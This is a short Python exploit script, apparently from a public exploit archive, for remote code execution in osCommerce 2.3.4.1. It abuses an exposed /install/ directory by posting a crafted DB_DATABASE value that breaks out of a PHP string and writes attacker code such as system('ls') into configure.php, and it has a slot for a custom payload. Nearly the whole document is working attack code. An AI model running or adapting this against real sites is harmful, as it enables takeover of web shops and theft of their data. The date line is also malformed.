# Exploit Title: osCommerce 2.3.4.1 Remote Code Execution # Date: 29.0.3.2018 # Exploit Author: Simon Scannell - https://scannell-infosec.net # Version: 2.3.4.1, 2.3.4 - Other versions have not been tested but are likely to be vulnerable # Tested on: Linux, Windows # If an Admin has not removed the /install/ directory as advised from an osCommerce installation, it is possible # for an unauthenticated attacker to reinstall the page. The installation of osCommerce does not check if the page # is already installed and does not attempt to do any authentication. It is possible for an attacker to directly # execute the "install_4.php" script, which will create the config file for the installation. It is possible to inject # PHP code into the config file and then simply executing the code by opening it. import requests # enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4) base_url = "http://localhost//oscommerce-2.3.4.1/catalog/" target_url = "http://localhost/oscommerce-2.3.4.1/catalog/install/install.php?step=4" data = { 'DIR_FS_DOCUMENT_ROOT': './' } # the payload will be injected into the configuration file via this code # ' define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" . # so the format for the exploit will be: '); PAYLOAD; /* payload = '\');' payload += 'system("ls");' # this is where you enter you PHP payload payload += '/*' data['DB_DATABASE'] = payload # exploit it r = requests.post(url=target_url, data=data) if r.status_code == 200: print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php") else: print("[-] Exploit did not execute as planned")